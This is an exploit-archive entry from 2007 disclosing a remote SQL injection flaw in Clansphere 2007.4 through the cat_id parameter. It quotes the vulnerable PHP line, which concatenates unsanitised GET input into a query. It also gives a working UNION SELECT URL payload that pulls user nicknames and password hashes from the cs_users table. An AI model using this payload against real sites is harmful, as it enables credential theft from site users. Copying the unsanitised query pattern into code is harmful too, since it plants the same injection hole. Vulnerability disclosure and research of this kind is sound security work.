[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Clansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability
# Published : 2007-09-22
# Author : IHTeam
# Previous Title : phpFullAnnu (PFA) 6.0 Remote SQL Injection Vulnerability
# Next Title : Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability
#########################################################################################
#
# Inclusion Hunter Team
# http://www.ihteam.net
#
#
# [Clansphere 2007.4]
#
#
# Class: SQL Injection
# Found: 22/09/2007
# Remote: Yes
# Site: http://www.clansphere.net/
# Download: http://sourceforge.net/project/showfiles.php?group_id=95430
# Author: R00T[ATI] of IHTeam
# Contact: r00t.ati@ihteam.net - http://www.ihteam.net
#
#########################################################################################
Vulnerable code:
mods/banners/navlist.php
============================================================================================================
if(!empty($_GET['cat_id'])) {
$where = "categories_id = '" . $_GET['cat_id'] . "'";
============================================================================================================
Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================
http://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu
ll%20FROM%20cs_users/*
===================================================================================================================
Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================
# www.Syue.com [2007-09-22]